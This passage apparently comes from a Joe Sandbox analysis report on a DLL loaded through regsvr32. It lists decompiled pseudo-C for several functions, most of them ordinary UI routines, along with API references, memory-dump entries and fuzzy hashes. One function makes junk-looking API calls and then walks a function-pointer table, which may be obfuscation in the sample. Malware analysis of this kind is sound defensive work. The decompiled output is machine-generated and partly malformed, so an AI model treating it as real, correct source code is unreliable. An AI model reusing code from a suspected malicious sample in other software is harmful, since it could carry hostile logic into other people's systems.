					_t11 = _t49 + 4; // 0x1000ecc8
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000567F(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E100100ED(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E10010BA6(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1003b2dc, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E10010141(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001260( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038068;
				E100102E5(_t91 - 0x54);
				return E1001FCB0(_t74, 0, _t90);
			}











                                                                                                            0x10014290
                                                                                                            0x10014290
                                                                                                            0x1001429a
                                                                                                            0x1001429f
                                                                                                            0x100142a4
                                                                                                            0x100142a6
                                                                                                            0x100142a9
                                                                                                            0x100142b2
                                                                                                            0x100142b5
                                                                                                            0x100142c8
                                                                                                            0x100142e0
                                                                                                            0x00000000
                                                                                                            0x100142d8
                                                                                                            0x100142d8
                                                                                                            0x100142d8
                                                                                                            0x100142e3
                                                                                                            0x100142e3
                                                                                                            0x100142e9
                                                                                                            0x100142ec
                                                                                                            0x100142f5
                                                                                                            0x100142f9
                                                                                                            0x10014300
                                                                                                            0x10014308
                                                                                                            0x1001430f
                                                                                                            0x10014318
                                                                                                            0x10014320
                                                                                                            0x10014327
                                                                                                            0x1001432e
                                                                                                            0x10014331
                                                                                                            0x10014334
                                                                                                            0x10014336
                                                                                                            0x1001433a
                                                                                                            0x1001433c
                                                                                                            0x10014340
                                                                                                            0x10014340
                                                                                                            0x1001434b
                                                                                                            0x10014358
                                                                                                            0x10014362
                                                                                                            0x10014366
                                                                                                            0x1001436c
                                                                                                            0x1001436d
                                                                                                            0x1001436f
                                                                                                            0x10014373
                                                                                                            0x10014376
                                                                                                            0x10014379
                                                                                                            0x10014384
                                                                                                            0x10014388
                                                                                                            0x1001438e
                                                                                                            0x10014390
                                                                                                            0x10014392
                                                                                                            0x10014392
                                                                                                            0x1001439a
                                                                                                            0x1001439e
                                                                                                            0x100143a6
                                                                                                            0x100143a9
                                                                                                            0x100143a9
                                                                                                            0x100143ae
                                                                                                            0x100143b5
                                                                                                            0x100143bc
                                                                                                            0x100143c6

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1001429A
                                                                                                            • GetObjectA.GDI32(1000ECC8,0000003C,?), ref: 100142EC
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001435C
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,1003B2DC), ref: 10014388
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 2429671754-3916222277
                                                                                                            • Opcode ID: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
                                                                                                            • Instruction ID: 2f8d2d43e09bdf50e625724661aa14f311a958ac26713a9e64237ed0808844fe
                                                                                                            • Opcode Fuzzy Hash: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
                                                                                                            • Instruction Fuzzy Hash: C7417E74E012989FDB11CFE4C941ADDFBF4EF18340F10815AE955EB2A2EBB49A84CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10006878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E10006878(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10045580; // 0x8f64cb61
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10044410;
					E100209E8( &_v172, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t38, _t42, _t43);
					_t40 = E100105C8(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000E58E(_t40);
					}
					return E1001FC9C(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E10020F40(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1003720c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10048668 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10048668 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1001FBB5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}






















                                                                                                            0x10006879
                                                                                                            0x10006883
                                                                                                            0x1000688a
                                                                                                            0x1000688e
                                                                                                            0x1000688f
                                                                                                            0x10006890
                                                                                                            0x10006896
                                                                                                            0x1000689f
                                                                                                            0x100068a2
                                                                                                            0x100068a5
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x100068b1
                                                                                                            0x100068b4
                                                                                                            0x100068b8
                                                                                                            0x100068b8
                                                                                                            0x100068b9
                                                                                                            0x100068bc
                                                                                                            0x100068bd
                                                                                                            0x100068bf
                                                                                                            0x100068c2
                                                                                                            0x100068c7
                                                                                                            0x100068cb
                                                                                                            0x100068ce
                                                                                                            0x100068d0
                                                                                                            0x100068d5
                                                                                                            0x100068d9
                                                                                                            0x100068d9
                                                                                                            0x100068dc
                                                                                                            0x100068df
                                                                                                            0x100068e1
                                                                                                            0x100068e1
                                                                                                            0x100068f2
                                                                                                            0x100068fa
                                                                                                            0x10006902
                                                                                                            0x10006905
                                                                                                            0x10006908
                                                                                                            0x1000690c
                                                                                                            0x10006911
                                                                                                            0x10006914
                                                                                                            0x1000691b
                                                                                                            0x1000691b
                                                                                                            0x1000691f
                                                                                                            0x10006921
                                                                                                            0x10006924
                                                                                                            0x10006928
                                                                                                            0x1000692b
                                                                                                            0x1000692d
                                                                                                            0x10006930
                                                                                                            0x10006933
                                                                                                            0x10006933
                                                                                                            0x10006933
                                                                                                            0x10006938
                                                                                                            0x10006944
                                                                                                            0x1000694c
                                                                                                            0x1000694d
                                                                                                            0x1000694e
                                                                                                            0x10006953
                                                                                                            0x10006954
                                                                                                            0x1000695c
                                                                                                            0x10006962
                                                                                                            0x10006962
                                                                                                            0x10006967
                                                                                                            0x1000696a
                                                                                                            0x1000696c
                                                                                                            0x10006971
                                                                                                            0x10006974
                                                                                                            0x10006974
                                                                                                            0x10006975
                                                                                                            0x10006975

                                                                                                            APIs
                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 10006890
                                                                                                            • _memset.LIBCMT ref: 100068F2
                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10006944
                                                                                                            • LoadBitmapA.USER32 ref: 1000695C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                            • Opcode ID: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
                                                                                                            • Instruction ID: 7502f03d00862ab63d890e742e6b2e485ad896773ebef231c484e9e01049f3a3
                                                                                                            • Opcode Fuzzy Hash: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
                                                                                                            • Instruction Fuzzy Hash: 9E31C572A0025A9FFF10CFB8CDC5AAE7BA5EF48384F25452AE906EB195DA309944C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10002863(intOrPtr* _a4) {
				int _v4;
				intOrPtr _v8;
				intOrPtr* _t26;
				short* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				short* _t36;

				_t32 = L"xadqsavcbdfewescGADW";
				_t36 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v8 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9);
				_t33 =  *_a4 + 0xc0 + (_v4 + GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9)) *  *0x100440dc * 8;
				if( *_t33 != 0) {
					_t35 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t36, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *_t33 + _v8 + 0xc));
					if(_t35 != 0) {
						while(1) {
							_t26 =  *_t35;
							if(_t26 == 0) {
								goto L5;
							}
							 *_t26(_v8, 1, 0);
							_t35 = _t35 + 4;
						}
					}
				}
				L5:
				return 1;
			}










                                                                                                            0x1000287b
                                                                                                            0x10002883
                                                                                                            0x10002891
                                                                                                            0x100028a3
                                                                                                            0x100028bc
                                                                                                            0x100028c7
                                                                                                            0x100028e6
                                                                                                            0x100028eb
                                                                                                            0x100028fc
                                                                                                            0x100028fc
                                                                                                            0x10002900
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100028f7
                                                                                                            0x100028f9
                                                                                                            0x100028f9
                                                                                                            0x100028fc
                                                                                                            0x100028eb
                                                                                                            0x10002904
                                                                                                            0x1000290b

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002895
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100028A7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100028D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
                                                                                                            • Instruction ID: af9e15b59c393e0d8099aaf98a9213ea7197e89f84b9fb059b6d85f6975e4071
                                                                                                            • Opcode Fuzzy Hash: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
                                                                                                            • Instruction Fuzzy Hash: 7811BFB1604319BFE700DB55CC89F17BBECEB89754F12441AFA40EB291C771AC008B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007AB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10007AB6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10008D3D(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000B1DD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10009199(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1001113D(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













                                                                                                            0x10007ab6
                                                                                                            0x10007ab6
                                                                                                            0x10007ab8
                                                                                                            0x10007abd
                                                                                                            0x10007ac6
                                                                                                            0x10007acf
                                                                                                            0x10007ad4
                                                                                                            0x10007ad6
                                                                                                            0x10007ae2
                                                                                                            0x10007ae2
                                                                                                            0x10007ae9
                                                                                                            0x10007b44
                                                                                                            0x00000000
                                                                                                            0x10007b47
                                                                                                            0x10007aeb
                                                                                                            0x10007aee
                                                                                                            0x10007af1
                                                                                                            0x10007af8
                                                                                                            0x10007b02
                                                                                                            0x10007b04
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b0d
                                                                                                            0x10007b12
                                                                                                            0x10007b14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b1b
                                                                                                            0x10007b21
                                                                                                            0x10007b23
                                                                                                            0x10007b30
                                                                                                            0x10007b3c
                                                                                                            0x00000000
                                                                                                            0x10007b3c
                                                                                                            0x10007b26
                                                                                                            0x10007b2c
                                                                                                            0x10007b2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007b2e
                                                                                                            0x10007af3
                                                                                                            0x10007af6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007af6
                                                                                                            0x10007ad8
                                                                                                            0x10007adc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007ade
                                                                                                            0x10007ac8
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Edit
                                                                                                            • API String ID: 0-554135844
                                                                                                            • Opcode ID: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
                                                                                                            • Instruction ID: c236510ebf9aa878e60991b13e4b4610bd432db7ec560ce308cb7ed9e00e23a0
                                                                                                            • Opcode Fuzzy Hash: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
                                                                                                            • Instruction Fuzzy Hash: 1301AD30B00252AEFA52D6208C44F4EF7A9FF457D5F104529F54AD60BACB68E860C621
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100143C9 Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100143C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1001FBC4(E10033F57, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x10014589) & 0x000000ff) * 4 +  &M10014561))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E10014A76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004C10(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E100100ED(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E10010141(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001370D( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E10014290(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E1001044F();
							__ecx = __ebp + 0xc;
							__eax = E1000424F(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1000AE99(__ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001260( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1001FC9C(_t56);
			}






                                                                                                            0x100143c9
                                                                                                            0x100143d0
                                                                                                            0x100143da
                                                                                                            0x100143e3
                                                                                                            0x10014556
                                                                                                            0x10014556
                                                                                                            0x100143e9
                                                                                                            0x100143f0
                                                                                                            0x00000000
                                                                                                            0x10014416
                                                                                                            0x10014419
                                                                                                            0x1001441e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100143f7
                                                                                                            0x100143fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144ca
                                                                                                            0x100144cd
                                                                                                            0x100144d0
                                                                                                            0x100144d5
                                                                                                            0x100144da
                                                                                                            0x100144dc
                                                                                                            0x100144de
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001440c
                                                                                                            0x1001440f
                                                                                                            0x100143ff
                                                                                                            0x100143ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014532
                                                                                                            0x10014538
                                                                                                            0x1001453b
                                                                                                            0x10014545
                                                                                                            0x10014548
                                                                                                            0x1001454f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144e7
                                                                                                            0x100144ea
                                                                                                            0x100144ef
                                                                                                            0x100144f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014426
                                                                                                            0x1001442a
                                                                                                            0x1001442c
                                                                                                            0x1001442f
                                                                                                            0x10014432
                                                                                                            0x10014448
                                                                                                            0x1001445a
                                                                                                            0x1001445d
                                                                                                            0x10014463
                                                                                                            0x10014466
                                                                                                            0x10014469
                                                                                                            0x10014469
                                                                                                            0x1001446e
                                                                                                            0x10014474
                                                                                                            0x10014477
                                                                                                            0x1001447c
                                                                                                            0x10014483
                                                                                                            0x1001447e
                                                                                                            0x1001447e
                                                                                                            0x1001447e
                                                                                                            0x10014486
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001448e
                                                                                                            0x10014492
                                                                                                            0x100144ae
                                                                                                            0x100144ae
                                                                                                            0x100144b1
                                                                                                            0x100144b6
                                                                                                            0x100144b9
                                                                                                            0x100144bb
                                                                                                            0x100144bc
                                                                                                            0x100144bf
                                                                                                            0x100144c2
                                                                                                            0x00000000
